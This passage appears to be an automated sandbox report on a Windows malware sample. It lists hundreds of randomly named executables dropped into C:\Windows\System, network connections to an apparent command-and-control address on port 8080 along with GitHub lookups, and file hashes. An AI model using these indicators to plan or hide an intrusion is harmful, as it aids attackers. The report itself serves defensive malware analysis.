C:\Windows\System\NkBKHek.exe

C:\Windows\System\gMdkilK.exe

C:\Windows\System\gMdkilK.exe

C:\Windows\System\yLpQBrE.exe

C:\Windows\System\yLpQBrE.exe

C:\Windows\System\QIIHZQH.exe

C:\Windows\System\QIIHZQH.exe

C:\Windows\System\UEcIrzB.exe

C:\Windows\System\UEcIrzB.exe

C:\Windows\System\oQzRskj.exe

C:\Windows\System\oQzRskj.exe

C:\Windows\System\GVoMneX.exe

C:\Windows\System\GVoMneX.exe

C:\Windows\System\olTgOor.exe

C:\Windows\System\olTgOor.exe

C:\Windows\System\soPABhX.exe

C:\Windows\System\soPABhX.exe

C:\Windows\System\YHsnzjz.exe

C:\Windows\System\YHsnzjz.exe

C:\Windows\System\OoXfymF.exe

C:\Windows\System\OoXfymF.exe

C:\Windows\System\AxxGPdp.exe

C:\Windows\System\AxxGPdp.exe

C:\Windows\System\vdGsTXY.exe

C:\Windows\System\vdGsTXY.exe

C:\Windows\System\KgjBCEz.exe

C:\Windows\System\KgjBCEz.exe

C:\Windows\System\CmQKDbz.exe

C:\Windows\System\CmQKDbz.exe

C:\Windows\System\qBKZOsJ.exe

C:\Windows\System\qBKZOsJ.exe

C:\Windows\System\WpVRcfz.exe

C:\Windows\System\WpVRcfz.exe

C:\Windows\System\nWIeoDK.exe

C:\Windows\System\nWIeoDK.exe

C:\Windows\System\obUgwCJ.exe

C:\Windows\System\obUgwCJ.exe

C:\Windows\System\vfTrQlN.exe

C:\Windows\System\vfTrQlN.exe

C:\Windows\System\AxhMwqr.exe

C:\Windows\System\AxhMwqr.exe

C:\Windows\System\VEGXjCl.exe

C:\Windows\System\VEGXjCl.exe

C:\Windows\System\etfJDjV.exe

C:\Windows\System\etfJDjV.exe

C:\Windows\System\CwxMrgD.exe

C:\Windows\System\CwxMrgD.exe

C:\Windows\System\hprnPOk.exe

C:\Windows\System\hprnPOk.exe

C:\Windows\System\zfnoJmi.exe

C:\Windows\System\zfnoJmi.exe

C:\Windows\System\MfVbNfX.exe

C:\Windows\System\MfVbNfX.exe

C:\Windows\System\WcFHdtX.exe

C:\Windows\System\WcFHdtX.exe

C:\Windows\System\QSTizyS.exe

C:\Windows\System\QSTizyS.exe

C:\Windows\System\ujxquFy.exe

C:\Windows\System\ujxquFy.exe

C:\Windows\System\pgdWPcl.exe

C:\Windows\System\pgdWPcl.exe

C:\Windows\System\ILzMknz.exe

C:\Windows\System\ILzMknz.exe

C:\Windows\System\KIXPhzv.exe

C:\Windows\System\KIXPhzv.exe

C:\Windows\System\rXqwWQz.exe

C:\Windows\System\rXqwWQz.exe

C:\Windows\System\OqwAvMp.exe

C:\Windows\System\OqwAvMp.exe

C:\Windows\System\yZuIrAE.exe

C:\Windows\System\yZuIrAE.exe

C:\Windows\System\ALvXtgG.exe

C:\Windows\System\ALvXtgG.exe

C:\Windows\System\gjtdajb.exe

C:\Windows\System\gjtdajb.exe

C:\Windows\System\AGopJDB.exe

C:\Windows\System\AGopJDB.exe

C:\Windows\System\RRBOGbc.exe

C:\Windows\System\RRBOGbc.exe

C:\Windows\System\NZnHBhL.exe

C:\Windows\System\NZnHBhL.exe

C:\Windows\System\CqKszLq.exe

C:\Windows\System\CqKszLq.exe

C:\Windows\System\tgFdUmu.exe

C:\Windows\System\tgFdUmu.exe

C:\Windows\System\tsdKRre.exe

C:\Windows\System\tsdKRre.exe

C:\Windows\System\ZxEnMJw.exe

C:\Windows\System\ZxEnMJw.exe

C:\Windows\System\IOeHyaA.exe

C:\Windows\System\IOeHyaA.exe

C:\Windows\System\DxMXFvL.exe

C:\Windows\System\DxMXFvL.exe

C:\Windows\System\YgicuAk.exe

C:\Windows\System\YgicuAk.exe

C:\Windows\System\nJxtIoc.exe

C:\Windows\System\nJxtIoc.exe

C:\Windows\System\BfQqJRy.exe

C:\Windows\System\BfQqJRy.exe

C:\Windows\System\caspHkI.exe

C:\Windows\System\caspHkI.exe

C:\Windows\System\wyRYiZi.exe

C:\Windows\System\wyRYiZi.exe

C:\Windows\System\IqALZNN.exe

C:\Windows\System\IqALZNN.exe

C:\Windows\System\MpuenFX.exe

C:\Windows\System\MpuenFX.exe

C:\Windows\System\HjmSaGD.exe

C:\Windows\System\HjmSaGD.exe

C:\Windows\System\xaeVLiA.exe

C:\Windows\System\xaeVLiA.exe

C:\Windows\System\GjFitbP.exe

C:\Windows\System\GjFitbP.exe

C:\Windows\System\rlqNuCw.exe

C:\Windows\System\rlqNuCw.exe

C:\Windows\System\YfvZXhB.exe

C:\Windows\System\YfvZXhB.exe

C:\Windows\System\GezhmQH.exe

C:\Windows\System\GezhmQH.exe

C:\Windows\System\GTzwXGA.exe

C:\Windows\System\GTzwXGA.exe

C:\Windows\System\NjHRhan.exe

C:\Windows\System\NjHRhan.exe

C:\Windows\System\uLOxLhO.exe

C:\Windows\System\uLOxLhO.exe

C:\Windows\System\ozMkZhX.exe

C:\Windows\System\ozMkZhX.exe

C:\Windows\System\fqquGiS.exe

C:\Windows\System\fqquGiS.exe

C:\Windows\System\mxDfLsi.exe

C:\Windows\System\mxDfLsi.exe

C:\Windows\System\iOWVkoG.exe

C:\Windows\System\iOWVkoG.exe

C:\Windows\System\YZcDPhV.exe

C:\Windows\System\YZcDPhV.exe

C:\Windows\System\XXgxOcc.exe

C:\Windows\System\XXgxOcc.exe

C:\Windows\System\NtzSWdu.exe

C:\Windows\System\NtzSWdu.exe

C:\Windows\System\auxjjOs.exe

C:\Windows\System\auxjjOs.exe

C:\Windows\System\LrgLQez.exe

C:\Windows\System\LrgLQez.exe

C:\Windows\System\JeiDxXg.exe

C:\Windows\System\JeiDxXg.exe

C:\Windows\System\WDSlnfl.exe

C:\Windows\System\WDSlnfl.exe

C:\Windows\System\SQwEKCc.exe

C:\Windows\System\SQwEKCc.exe

C:\Windows\System\vjnCMXB.exe

C:\Windows\System\vjnCMXB.exe

C:\Windows\System\vmVzueq.exe

C:\Windows\System\vmVzueq.exe

C:\Windows\System\bPszntD.exe

C:\Windows\System\bPszntD.exe

C:\Windows\System\lhuUVaP.exe

C:\Windows\System\lhuUVaP.exe

C:\Windows\System\LONNgCj.exe

C:\Windows\System\LONNgCj.exe

C:\Windows\System\LDZRGmB.exe

C:\Windows\System\LDZRGmB.exe

C:\Windows\System\sEeLAXR.exe

C:\Windows\System\sEeLAXR.exe

C:\Windows\System\tTGbTzN.exe

C:\Windows\System\tTGbTzN.exe

C:\Windows\System\qfZWjMZ.exe

C:\Windows\System\qfZWjMZ.exe

C:\Windows\System\YRcWGTd.exe

C:\Windows\System\YRcWGTd.exe

C:\Windows\System\WPHyDva.exe

C:\Windows\System\WPHyDva.exe

C:\Windows\System\fWRFpOZ.exe

C:\Windows\System\fWRFpOZ.exe

C:\Windows\System\rgMOXnW.exe

C:\Windows\System\rgMOXnW.exe

C:\Windows\System\YrZIhBl.exe

C:\Windows\System\YrZIhBl.exe

C:\Windows\System\PffLnBn.exe

C:\Windows\System\PffLnBn.exe

C:\Windows\System\hukmjQR.exe

C:\Windows\System\hukmjQR.exe

C:\Windows\System\zNlQqne.exe

C:\Windows\System\zNlQqne.exe

C:\Windows\System\wuwJfQX.exe

C:\Windows\System\wuwJfQX.exe

C:\Windows\System\LXWZDdI.exe

C:\Windows\System\LXWZDdI.exe

C:\Windows\System\PobCXzk.exe

C:\Windows\System\PobCXzk.exe

C:\Windows\System\TIWYdIx.exe

C:\Windows\System\TIWYdIx.exe

C:\Windows\System\cABaAig.exe

C:\Windows\System\cABaAig.exe

C:\Windows\System\IZyszRN.exe

C:\Windows\System\IZyszRN.exe

C:\Windows\System\ctxygfs.exe

C:\Windows\System\ctxygfs.exe

C:\Windows\System\AvHFgrn.exe

C:\Windows\System\AvHFgrn.exe

C:\Windows\System\rZNESFB.exe

C:\Windows\System\rZNESFB.exe

C:\Windows\System\IWntwHU.exe

C:\Windows\System\IWntwHU.exe

C:\Windows\System\kxjoKLm.exe

C:\Windows\System\kxjoKLm.exe

C:\Windows\System\GbJyyeo.exe

C:\Windows\System\GbJyyeo.exe

C:\Windows\System\XgymPAW.exe

C:\Windows\System\XgymPAW.exe

C:\Windows\System\ZJiJRDU.exe

C:\Windows\System\ZJiJRDU.exe

C:\Windows\System\kGAcxhM.exe

C:\Windows\System\kGAcxhM.exe

C:\Windows\System\NwuOzCz.exe

C:\Windows\System\NwuOzCz.exe

C:\Windows\System\vbILCDM.exe

C:\Windows\System\vbILCDM.exe

C:\Windows\System\PxDRhMN.exe

C:\Windows\System\PxDRhMN.exe

C:\Windows\System\NtHmeNh.exe

C:\Windows\System\NtHmeNh.exe

C:\Windows\System\ILWyMqx.exe

C:\Windows\System\ILWyMqx.exe

C:\Windows\System\XBbwWxq.exe

C:\Windows\System\XBbwWxq.exe

C:\Windows\System\YOLYRHr.exe

C:\Windows\System\YOLYRHr.exe

C:\Windows\System\uWOMMOp.exe

C:\Windows\System\uWOMMOp.exe

C:\Windows\System\usjBUWk.exe

C:\Windows\System\usjBUWk.exe

C:\Windows\System\AhJEnuL.exe

C:\Windows\System\AhJEnuL.exe

C:\Windows\System\tOpYvdD.exe

C:\Windows\System\tOpYvdD.exe

C:\Windows\System\lXQOVWH.exe

C:\Windows\System\lXQOVWH.exe

C:\Windows\System\LzpnRTQ.exe

C:\Windows\System\LzpnRTQ.exe

C:\Windows\System\yxXoRjJ.exe

C:\Windows\System\yxXoRjJ.exe

C:\Windows\System\DJFApdB.exe

C:\Windows\System\DJFApdB.exe

C:\Windows\System\wsQmdkB.exe

C:\Windows\System\wsQmdkB.exe

C:\Windows\System\iajptaW.exe

C:\Windows\System\iajptaW.exe

C:\Windows\System\sJFkuiq.exe

C:\Windows\System\sJFkuiq.exe

C:\Windows\System\nHhxBXV.exe

C:\Windows\System\nHhxBXV.exe

C:\Windows\System\KAoOnXP.exe

C:\Windows\System\KAoOnXP.exe

C:\Windows\System\OicGqOF.exe

C:\Windows\System\OicGqOF.exe

C:\Windows\System\QIZPFha.exe

C:\Windows\System\QIZPFha.exe

C:\Windows\System\RMgxPXo.exe

C:\Windows\System\RMgxPXo.exe

C:\Windows\System\lRjfTQb.exe

C:\Windows\System\lRjfTQb.exe

C:\Windows\System\gzSyAWr.exe

C:\Windows\System\gzSyAWr.exe

C:\Windows\System\UImpbVA.exe

C:\Windows\System\UImpbVA.exe

C:\Windows\System\EDudRYB.exe

C:\Windows\System\EDudRYB.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System\vplZrLI.exe

C:\Windows\System\vplZrLI.exe

C:\Windows\System\rGtCkny.exe

C:\Windows\System\rGtCkny.exe

C:\Windows\System\FKYHCxB.exe

C:\Windows\System\FKYHCxB.exe

C:\Windows\System\zdJZfsT.exe

C:\Windows\System\zdJZfsT.exe

C:\Windows\System\diGujRR.exe

C:\Windows\System\diGujRR.exe

C:\Windows\System\UBwuDGm.exe

C:\Windows\System\UBwuDGm.exe

C:\Windows\System\neDxTSY.exe

C:\Windows\System\neDxTSY.exe

C:\Windows\System\zXpKAJJ.exe

C:\Windows\System\zXpKAJJ.exe

C:\Windows\System\hiHVtPd.exe

C:\Windows\System\hiHVtPd.exe

C:\Windows\System\pxkExBk.exe

C:\Windows\System\pxkExBk.exe

C:\Windows\System\yfoiuUg.exe

C:\Windows\System\yfoiuUg.exe

C:\Windows\System\PjMAOzj.exe

C:\Windows\System\PjMAOzj.exe

C:\Windows\System\PhyyMgk.exe

C:\Windows\System\PhyyMgk.exe

C:\Windows\System\qtKEONt.exe

C:\Windows\System\qtKEONt.exe

C:\Windows\System\JAxRhNX.exe

C:\Windows\System\JAxRhNX.exe

C:\Windows\System\dzbTUDz.exe

C:\Windows\System\dzbTUDz.exe

C:\Windows\System\zqboaLY.exe

C:\Windows\System\zqboaLY.exe

C:\Windows\System\OKzURHi.exe

C:\Windows\System\OKzURHi.exe

C:\Windows\System\sAalPch.exe

C:\Windows\System\sAalPch.exe

C:\Windows\System\joPZOhJ.exe

C:\Windows\System\joPZOhJ.exe

C:\Windows\System\PQYuXeh.exe

C:\Windows\System\PQYuXeh.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System\nWrmWCO.exe

C:\Windows\System\nWrmWCO.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System\hgzgpXq.exe

C:\Windows\System\hgzgpXq.exe

C:\Windows\System\qmsPBgX.exe

C:\Windows\System\qmsPBgX.exe

C:\Windows\System\hjELabS.exe

C:\Windows\System\hjELabS.exe

C:\Windows\System\DynNRVe.exe

C:\Windows\System\DynNRVe.exe

C:\Windows\System\OjXozMW.exe

C:\Windows\System\OjXozMW.exe

C:\Windows\System\KiOkcrz.exe

C:\Windows\System\KiOkcrz.exe

C:\Windows\System\sqvNWVZ.exe

C:\Windows\System\sqvNWVZ.exe

C:\Windows\System\FsHOdRX.exe

C:\Windows\System\FsHOdRX.exe

C:\Windows\System\tRQeBkw.exe

C:\Windows\System\tRQeBkw.exe

C:\Windows\System\uFqugjW.exe

C:\Windows\System\uFqugjW.exe

C:\Windows\System\gbIlVpU.exe

C:\Windows\System\gbIlVpU.exe

C:\Windows\System\gbDNdra.exe

C:\Windows\System\gbDNdra.exe

C:\Windows\System\zPwVyMy.exe

C:\Windows\System\zPwVyMy.exe

C:\Windows\System\uIItgRM.exe

C:\Windows\System\uIItgRM.exe

C:\Windows\System\TFUSvdE.exe

C:\Windows\System\TFUSvdE.exe

C:\Windows\System\UsFjfvC.exe

C:\Windows\System\UsFjfvC.exe

C:\Windows\System\SMLWgJc.exe

C:\Windows\System\SMLWgJc.exe

C:\Windows\System\aSpPRGe.exe

C:\Windows\System\aSpPRGe.exe

C:\Windows\System\nnwcrtc.exe

C:\Windows\System\nnwcrtc.exe

C:\Windows\System\spYWiTq.exe

C:\Windows\System\spYWiTq.exe

C:\Windows\System\oarlhwf.exe

C:\Windows\System\oarlhwf.exe

C:\Windows\System\EwQmUOe.exe

C:\Windows\System\EwQmUOe.exe

C:\Windows\System\XtliCeU.exe

C:\Windows\System\XtliCeU.exe

C:\Windows\System\qJRZwBs.exe

C:\Windows\System\qJRZwBs.exe

C:\Windows\System\lYPBipv.exe

C:\Windows\System\lYPBipv.exe

C:\Windows\System\BncXfyc.exe

C:\Windows\System\BncXfyc.exe

C:\Windows\System\gVjHVOt.exe

C:\Windows\System\gVjHVOt.exe

C:\Windows\System\wTxKYnx.exe

C:\Windows\System\wTxKYnx.exe

C:\Windows\System\zuuuwSZ.exe

C:\Windows\System\zuuuwSZ.exe

C:\Windows\System\GgelFRF.exe

C:\Windows\System\GgelFRF.exe

C:\Windows\System\pMdABEx.exe

C:\Windows\System\pMdABEx.exe

C:\Windows\System\YFLAYME.exe

C:\Windows\System\YFLAYME.exe

C:\Windows\System\hwzXfSJ.exe

C:\Windows\System\hwzXfSJ.exe

C:\Windows\System\mAkIPku.exe

C:\Windows\System\mAkIPku.exe

C:\Windows\System\qKtpBjL.exe

C:\Windows\System\qKtpBjL.exe

C:\Windows\System\vLlxXGw.exe

C:\Windows\System\vLlxXGw.exe

C:\Windows\System\TKyGNoC.exe

C:\Windows\System\TKyGNoC.exe

C:\Windows\System\GKYfndc.exe

C:\Windows\System\GKYfndc.exe

C:\Windows\System\ndDwMwu.exe

C:\Windows\System\ndDwMwu.exe

C:\Windows\System\KzKSKUq.exe

C:\Windows\System\KzKSKUq.exe

C:\Windows\System\ktPjaNj.exe

C:\Windows\System\ktPjaNj.exe

C:\Windows\System\mbaEKwt.exe

C:\Windows\System\mbaEKwt.exe

C:\Windows\System\EcxzJFY.exe

C:\Windows\System\EcxzJFY.exe

C:\Windows\System\hHJxHTq.exe

C:\Windows\System\hHJxHTq.exe

C:\Windows\System\xBmFSsi.exe

C:\Windows\System\xBmFSsi.exe

C:\Windows\System\aeVqaUe.exe

C:\Windows\System\aeVqaUe.exe

C:\Windows\System\foQpSeO.exe

C:\Windows\System\foQpSeO.exe

C:\Windows\System\qgaKkda.exe

C:\Windows\System\qgaKkda.exe

C:\Windows\System\WeVCfEp.exe

C:\Windows\System\WeVCfEp.exe

C:\Windows\System\ncCsvAb.exe

C:\Windows\System\ncCsvAb.exe

C:\Windows\System\LwTGgoF.exe

C:\Windows\System\LwTGgoF.exe

C:\Windows\System\vCcBKzf.exe

C:\Windows\System\vCcBKzf.exe

C:\Windows\System\oTXCHJB.exe

C:\Windows\System\oTXCHJB.exe

C:\Windows\System\HsYnVym.exe

C:\Windows\System\HsYnVym.exe

C:\Windows\System\aXCcHoP.exe

C:\Windows\System\aXCcHoP.exe

C:\Windows\System\eMYiqmj.exe

C:\Windows\System\eMYiqmj.exe

C:\Windows\System\urfsEII.exe

C:\Windows\System\urfsEII.exe

C:\Windows\System\MVMVTaY.exe

C:\Windows\System\MVMVTaY.exe

C:\Windows\System\eElmWKL.exe

C:\Windows\System\eElmWKL.exe

C:\Windows\System\aIrtRdW.exe

C:\Windows\System\aIrtRdW.exe

C:\Windows\System\SJikMLR.exe

C:\Windows\System\SJikMLR.exe

C:\Windows\System\KnaLxPH.exe

C:\Windows\System\KnaLxPH.exe

C:\Windows\System\ZQISQoe.exe

C:\Windows\System\ZQISQoe.exe

C:\Windows\System\XriJKxx.exe

C:\Windows\System\XriJKxx.exe

C:\Windows\System\qrNnmZX.exe

C:\Windows\System\qrNnmZX.exe

C:\Windows\System\kuEqtpD.exe

C:\Windows\System\kuEqtpD.exe

C:\Windows\System\fvAeNHR.exe

C:\Windows\System\fvAeNHR.exe

C:\Windows\System\nAaaNYu.exe

C:\Windows\System\nAaaNYu.exe

C:\Windows\System\pAxFIFQ.exe

C:\Windows\System\pAxFIFQ.exe

C:\Windows\System\tqrXcTE.exe

C:\Windows\System\tqrXcTE.exe

C:\Windows\System\XAWcWto.exe

C:\Windows\System\XAWcWto.exe

C:\Windows\System\LpgfBDy.exe

C:\Windows\System\LpgfBDy.exe

C:\Windows\System\pfTcvZZ.exe

C:\Windows\System\pfTcvZZ.exe

C:\Windows\System\NrmFVGL.exe

C:\Windows\System\NrmFVGL.exe

C:\Windows\System\GfxUADS.exe

C:\Windows\System\GfxUADS.exe

C:\Windows\System\pAJieTC.exe

C:\Windows\System\pAJieTC.exe

C:\Windows\System\kZjFlYE.exe

C:\Windows\System\kZjFlYE.exe

C:\Windows\System\bsZFWwp.exe

C:\Windows\System\bsZFWwp.exe

C:\Windows\System\mTtfyck.exe

C:\Windows\System\mTtfyck.exe

C:\Windows\System\LOTBfJW.exe

C:\Windows\System\LOTBfJW.exe

C:\Windows\System\yKfpqZI.exe

C:\Windows\System\yKfpqZI.exe

C:\Windows\System\jQpILQs.exe

C:\Windows\System\jQpILQs.exe

C:\Windows\System\WQSxxLZ.exe

C:\Windows\System\WQSxxLZ.exe

C:\Windows\System\TuEVzia.exe

C:\Windows\System\TuEVzia.exe

C:\Windows\System\sWfKVln.exe

C:\Windows\System\sWfKVln.exe

C:\Windows\System\eprfOPL.exe

C:\Windows\System\eprfOPL.exe

C:\Windows\System\UgcqPMv.exe

C:\Windows\System\UgcqPMv.exe

C:\Windows\System\AdwVpJS.exe

C:\Windows\System\AdwVpJS.exe

C:\Windows\System\iLFZpoe.exe

C:\Windows\System\iLFZpoe.exe

C:\Windows\System\bKOJyVp.exe

C:\Windows\System\bKOJyVp.exe

C:\Windows\System\LbsaMXN.exe

C:\Windows\System\LbsaMXN.exe

C:\Windows\System\EjnrBmE.exe

C:\Windows\System\EjnrBmE.exe

C:\Windows\System\jduRAxD.exe

C:\Windows\System\jduRAxD.exe

C:\Windows\System\gxCsyxo.exe

C:\Windows\System\gxCsyxo.exe

C:\Windows\System\OosYaBZ.exe

C:\Windows\System\OosYaBZ.exe

C:\Windows\System\xRNsZrr.exe

C:\Windows\System\xRNsZrr.exe

C:\Windows\System\ZvYwXHF.exe

C:\Windows\System\ZvYwXHF.exe

C:\Windows\System\jAXtrOV.exe

C:\Windows\System\jAXtrOV.exe

C:\Windows\System\QoEIMRk.exe

C:\Windows\System\QoEIMRk.exe

C:\Windows\System\TqYCwvd.exe

C:\Windows\System\TqYCwvd.exe

C:\Windows\System\kSXCGzB.exe

C:\Windows\System\kSXCGzB.exe

C:\Windows\System\aJXYOWf.exe

C:\Windows\System\aJXYOWf.exe

C:\Windows\System\AzYNQud.exe

C:\Windows\System\AzYNQud.exe

C:\Windows\System\galosZn.exe

C:\Windows\System\galosZn.exe

C:\Windows\System\DEeIJsK.exe

C:\Windows\System\DEeIJsK.exe

C:\Windows\System\GnXEtLE.exe

C:\Windows\System\GnXEtLE.exe

C:\Windows\System\MzEYCzB.exe

C:\Windows\System\MzEYCzB.exe

C:\Windows\System\lXFcywS.exe

C:\Windows\System\lXFcywS.exe

C:\Windows\System\TMGuGYi.exe

C:\Windows\System\TMGuGYi.exe

C:\Windows\System\DvCxoBx.exe

C:\Windows\System\DvCxoBx.exe

C:\Windows\System\qEXDjAE.exe

C:\Windows\System\qEXDjAE.exe

C:\Windows\System\nzeGQUu.exe

C:\Windows\System\nzeGQUu.exe

C:\Windows\System\LgjDPwk.exe

C:\Windows\System\LgjDPwk.exe

C:\Windows\System\eiSLMTm.exe

C:\Windows\System\eiSLMTm.exe

C:\Windows\System\GTSEPlP.exe

C:\Windows\System\GTSEPlP.exe

C:\Windows\System\VZIcYMD.exe

C:\Windows\System\VZIcYMD.exe

C:\Windows\System\OrCauMF.exe

C:\Windows\System\OrCauMF.exe

C:\Windows\System\CjliGDG.exe

C:\Windows\System\CjliGDG.exe

C:\Windows\System\NSoIECi.exe

C:\Windows\System\NSoIECi.exe

C:\Windows\System\gupfamw.exe

C:\Windows\System\gupfamw.exe

C:\Windows\System\GYFAfVY.exe

C:\Windows\System\GYFAfVY.exe

C:\Windows\System\TziQPPv.exe

C:\Windows\System\TziQPPv.exe

C:\Windows\System\XpUTHQH.exe

C:\Windows\System\XpUTHQH.exe

C:\Windows\System\PrrQdNw.exe

C:\Windows\System\PrrQdNw.exe

C:\Windows\System\fHXBaOA.exe

C:\Windows\System\fHXBaOA.exe

C:\Windows\System\zyetCKD.exe

C:\Windows\System\zyetCKD.exe

C:\Windows\System\YDMnDBA.exe

C:\Windows\System\YDMnDBA.exe

C:\Windows\System\zrsoLmw.exe

C:\Windows\System\zrsoLmw.exe

C:\Windows\System\CSQWliq.exe

C:\Windows\System\CSQWliq.exe

C:\Windows\System\XTSGdwu.exe

C:\Windows\System\XTSGdwu.exe

C:\Windows\System\olPYKcv.exe

C:\Windows\System\olPYKcv.exe

C:\Windows\System\yhlbOHk.exe

C:\Windows\System\yhlbOHk.exe

C:\Windows\System\NlcLotH.exe

C:\Windows\System\NlcLotH.exe

C:\Windows\System\uMoShca.exe

C:\Windows\System\uMoShca.exe

C:\Windows\System\GCysCLY.exe

C:\Windows\System\GCysCLY.exe

C:\Windows\System\CPQqFPo.exe

C:\Windows\System\CPQqFPo.exe

C:\Windows\System\ADGtgGt.exe

C:\Windows\System\ADGtgGt.exe

C:\Windows\System\dJUZhdc.exe

C:\Windows\System\dJUZhdc.exe

C:\Windows\System\ztKKDmm.exe

C:\Windows\System\ztKKDmm.exe

C:\Windows\System\iPnvIoJ.exe

C:\Windows\System\iPnvIoJ.exe

C:\Windows\System\WfYPTTJ.exe

C:\Windows\System\WfYPTTJ.exe

C:\Windows\System\DTuYYjN.exe

C:\Windows\System\DTuYYjN.exe

C:\Windows\System\JiFeBtQ.exe

C:\Windows\System\JiFeBtQ.exe

C:\Windows\System\ilPIvxm.exe

C:\Windows\System\ilPIvxm.exe

C:\Windows\System\JsKcVJq.exe

C:\Windows\System\JsKcVJq.exe

C:\Windows\System\YqcWvJr.exe

C:\Windows\System\YqcWvJr.exe

C:\Windows\System\jVNbZSY.exe

C:\Windows\System\jVNbZSY.exe

C:\Windows\System\VGITZWg.exe

C:\Windows\System\VGITZWg.exe

C:\Windows\System\wOypRNv.exe

C:\Windows\System\wOypRNv.exe

C:\Windows\System\nwmgxpi.exe

C:\Windows\System\nwmgxpi.exe

C:\Windows\System\qXdhzYi.exe

C:\Windows\System\qXdhzYi.exe

C:\Windows\System\SUxAvZN.exe

C:\Windows\System\SUxAvZN.exe

C:\Windows\System\iZXxQnX.exe

C:\Windows\System\iZXxQnX.exe

C:\Windows\System\uDZcDeG.exe

C:\Windows\System\uDZcDeG.exe

C:\Windows\System\uAFVoAU.exe

C:\Windows\System\uAFVoAU.exe

C:\Windows\System\vddgbKt.exe

C:\Windows\System\vddgbKt.exe

C:\Windows\System\xShaMnF.exe

C:\Windows\System\xShaMnF.exe

C:\Windows\System\ISrSQmV.exe

C:\Windows\System\ISrSQmV.exe

C:\Windows\System\ZBBPTcB.exe

C:\Windows\System\ZBBPTcB.exe

C:\Windows\System\rZeJBtu.exe

C:\Windows\System\rZeJBtu.exe

C:\Windows\System\HBqBYRj.exe

C:\Windows\System\HBqBYRj.exe

C:\Windows\System\NRAAzmh.exe

C:\Windows\System\NRAAzmh.exe

C:\Windows\System\kQAaZQW.exe

C:\Windows\System\kQAaZQW.exe

C:\Windows\System\eokPCFs.exe

C:\Windows\System\eokPCFs.exe

C:\Windows\System\jExLWYQ.exe

C:\Windows\System\jExLWYQ.exe

C:\Windows\System\VfyYFrp.exe

C:\Windows\System\VfyYFrp.exe

C:\Windows\System\qxwgLFF.exe

C:\Windows\System\qxwgLFF.exe

C:\Windows\System\oyuIxBn.exe

C:\Windows\System\oyuIxBn.exe

C:\Windows\System\CZhVGcf.exe

C:\Windows\System\CZhVGcf.exe

C:\Windows\System\HfmlqJj.exe

C:\Windows\System\HfmlqJj.exe

C:\Windows\System\aEDAAaQ.exe

C:\Windows\System\aEDAAaQ.exe

C:\Windows\System\PGtPLhD.exe

C:\Windows\System\PGtPLhD.exe

C:\Windows\System\ihFRezu.exe

C:\Windows\System\ihFRezu.exe

C:\Windows\System\KDbAnWm.exe

C:\Windows\System\KDbAnWm.exe

C:\Windows\System\bRzPwEn.exe

C:\Windows\System\bRzPwEn.exe

C:\Windows\System\tGdIbVi.exe

C:\Windows\System\tGdIbVi.exe

C:\Windows\System\jRFUlll.exe

C:\Windows\System\jRFUlll.exe

C:\Windows\System\qMrlYhN.exe

C:\Windows\System\qMrlYhN.exe

C:\Windows\System\vtxZjub.exe

C:\Windows\System\vtxZjub.exe

C:\Windows\System\PSghHKa.exe

C:\Windows\System\PSghHKa.exe

C:\Windows\System\pYXLdRR.exe

C:\Windows\System\pYXLdRR.exe

C:\Windows\System\JeaczlI.exe

C:\Windows\System\JeaczlI.exe

C:\Windows\System\WyoVsQJ.exe

C:\Windows\System\WyoVsQJ.exe

C:\Windows\System\GADTktZ.exe

C:\Windows\System\GADTktZ.exe

C:\Windows\System\arLYjPK.exe

C:\Windows\System\arLYjPK.exe

C:\Windows\System\berxCsK.exe

C:\Windows\System\berxCsK.exe

C:\Windows\System\IivXCpA.exe

C:\Windows\System\IivXCpA.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/3428-0-0x00007FF724820000-0x00007FF724C12000-memory.dmp

memory/3428-1-0x00000199D81E0000-0x00000199D81F0000-memory.dmp

memory/4520-3-0x00007FF83DD73000-0x00007FF83DD75000-memory.dmp

C:\Windows\System\EMahSjJ.exe

MD5 9960527844b557fa319d945fcc66587c
SHA1 0a9341fd8c558c099ac112571afcccd2e858f532
SHA256 12a13fbc1a5440fb64023713ddb4dd4da9681753a178428116b747d9601b607e
SHA512 8f54bd7dc539039dd7deb57bcbdc4a8286a6e267e60b5964cab4bc3a31ca24b2f2246cd77ee101c037ed7e2de271a59987bef10fbcf1899b63923bb355553dbc

C:\Windows\System\xbMKovq.exe

MD5 3fec0e74ea66e464f5958c31b8f56a20
SHA1 febde5c1f39180d571c64974f0ccfadb57c17c89
SHA256 fa543985e208b3c5e598579e29874740c01445bf360c8ee403d57ddd6e79d869
SHA512 f9eca9791d508fa8e495ef90cca144ad79c437ffdacaebbe65d0432b6d56d5b51e18b6a2716ffb9d19a9424cae960435d77b19b05c5d86dc9e9136c5e766a3f4

C:\Windows\System\aKCAmlY.exe

MD5 9e2c0f30dd571fc228ac26ca6ec0c894
SHA1 96053669600b8525b1ba125cbab63fafbd64e277
SHA256 e14f75d3119726c17d2f338c7ec094c7e4dd371630e26d3a0acb1fb85185ebcb
SHA512 bc9e7e912df08b5b5619e5b67dd15d795fd2b7a240bb0c9f55fab76810d8c9854a77b67923714ceda5e1d8687d06c05cfd5bb86cab9a0cb884fdfe512a20b503

C:\Windows\System\hOglZUz.exe

MD5 1ba1ee86119725c3db930727d8cf028f
SHA1 e781393a8404ae95838bb85cddf075377a5c8f76
SHA256 91045b916df553e654ee5cf838e7e4189366ede9af03a179941eb29004ba13a5
